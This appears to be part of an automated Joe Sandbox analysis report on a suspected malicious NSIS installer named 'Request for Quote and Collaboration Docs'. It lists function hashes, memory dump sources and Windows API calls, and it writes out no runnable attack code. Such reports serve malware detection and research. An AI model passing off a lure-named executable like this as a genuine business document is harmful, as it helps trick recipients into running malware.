                                                                                          • Opcode ID: dd708d6331c717b39d50fafa4887b8fb5f98c1a8ff7471621c72203cd843cc6a
                                                                                          • Instruction ID: f92d6f19c72ea21fc7b9264561236c3f0fb1be24f547da7145f5acb761d85663
                                                                                          • Opcode Fuzzy Hash: dd708d6331c717b39d50fafa4887b8fb5f98c1a8ff7471621c72203cd843cc6a
                                                                                          • Instruction Fuzzy Hash: CAF09C31380610CB87155A2EE85462A77EEEFC8B56395417AED19CF361EF21CC478791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5d87de69cb10b84e465ad1678b88a32f7fa74a99434289a39dd06fc1b6aefc9
                                                                                          • Instruction ID: d0461daf23e4b564054cc85d27863eab905750cd53d3f79799e92ff393461b74
                                                                                          • Opcode Fuzzy Hash: f5d87de69cb10b84e465ad1678b88a32f7fa74a99434289a39dd06fc1b6aefc9
                                                                                          • Instruction Fuzzy Hash: 77F04435300214EFDB091BE59854ABBBB9BEBCC361B144429BD4AC7351DF71CC5583A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                          • Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
                                                                                          • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                          • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                          • Instruction ID: e07f69eb9864daab4bc7e152dae6a04e1e42d7d8ab62cf44b6f8a855657936cc
                                                                                          • Opcode Fuzzy Hash: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                          • Instruction Fuzzy Hash: 60E0EC36A00108DFDF05CF59E844AEDB7B2EB98326F11C066EA198B214D7358A65DB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c725c745ac40424b032527d0e1854f3dcb231159d2d7eff0cfab60068bee1cbe
                                                                                          • Instruction ID: f1b4d3b0a3f771f76bd1227511f6aecad3da487a41e353241139256ba570f923
                                                                                          • Opcode Fuzzy Hash: c725c745ac40424b032527d0e1854f3dcb231159d2d7eff0cfab60068bee1cbe
                                                                                          • Instruction Fuzzy Hash: F2E08C3404C3818FCB13E7B198A44883F72AF4210070482A5D0499F5ABDFB80A8B8B22
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f7242605d9a6db7f80e9c37484c11886b815a20f2e70a02510984ef7e243d61
                                                                                          • Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
                                                                                          • Opcode Fuzzy Hash: 3f7242605d9a6db7f80e9c37484c11886b815a20f2e70a02510984ef7e243d61
                                                                                          • Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 712e08c7da24ba2791d4fd2cd3ee3ff062cffc2697c8cf68e4e5f4028193dbe2
                                                                                          • Instruction ID: 6082eaffecafc66902858fee46d713e419801cefce18698f22c3901435617a65
                                                                                          • Opcode Fuzzy Hash: 712e08c7da24ba2791d4fd2cd3ee3ff062cffc2697c8cf68e4e5f4028193dbe2
                                                                                          • Instruction Fuzzy Hash: 88D01235D6022AC69B11EBA59C140EDBB34AE95221B548616D57437150EB30165D86A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                          • Instruction ID: 7664a699ddf78696b84bb1121c3968f2adab32b7b61b11eb126afe8992ed5369
                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                          • Instruction Fuzzy Hash: 64C0803310C1246A9234104E7C40DA3774DC3C53B5A210137FD3CE7200DC425C8401F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6879ff93d92a60a4728e352f981a74a2a2a49d4f7a74ca95a32e9b5147a3127b
                                                                                          • Instruction ID: d414150d177f2aab5680927dd9057748d8ab82ab16e190e1c471fb7cb60f76a7
                                                                                          • Opcode Fuzzy Hash: 6879ff93d92a60a4728e352f981a74a2a2a49d4f7a74ca95a32e9b5147a3127b
                                                                                          • Instruction Fuzzy Hash: 1FD0673AB00009AFCB159F98EC809DDF776FB98221B148116E915A3260C73199A5DB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb658a70338ff4c51d18f1d24204cff5b79713260d90f8ea6864879783ac4d0d
                                                                                          • Instruction ID: 91d189cdd3c1d5f4c7ffb44025e8b733488d427c92f496e82477db11eee0a778
                                                                                          • Opcode Fuzzy Hash: cb658a70338ff4c51d18f1d24204cff5b79713260d90f8ea6864879783ac4d0d
                                                                                          • Instruction Fuzzy Hash: 2FC012300483088BD681F7E1DC55555333B6780100740C610A1091B66AEFB46AD64B91
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                          • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                          • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                          • String ID: $M$N
                                                                                          • API String ID: 1638840714-813528018
                                                                                          • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                          • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                          • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                          • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                          APIs
                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                          • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                          • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                          • OleUninitialize.OLE32(?), ref: 00403621
                                                                                          • ExitProcess.KERNEL32 ref: 00403641
                                                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                          • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                          • ExitProcess.KERNEL32 ref: 004037BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                          • API String ID: 4107622049-1875889550
                                                                                          • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                          • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                          • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                          • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,?,00436800,76F92EE0,00434000), ref: 0040579B
                                                                                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,76F92EE0,00434000), ref: 004057E3
                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 00405806
                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040580C
                                                                                          • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040581C
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                          • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2035342205-1173974218
                                                                                          • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                          • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                          • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                          • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                          • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                          • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                          • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,76F92EE0,00405792,?,00436800,76F92EE0), ref: 00406238
                                                                                          • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID: WB
                                                                                          • API String ID: 2295610775-2854515933
                                                                                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                          • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                          • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                          • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                            • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                          • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                          • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                          • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                          • CreatePopupMenu.USER32 ref: 00405562
                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                          • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                          • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                          • EmptyClipboard.USER32 ref: 004055FD
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                          • CloseClipboard.USER32 ref: 00405658
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                          • String ID: {
                                                                                          • API String ID: 590372296-366298937
                                                                                          • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                          • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                          • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                          • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                          • ShowWindow.USER32(?), ref: 00403CB0
                                                                                          • DestroyWindow.USER32 ref: 00403CC4
                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                          • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                          • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                          Memory Dump Source
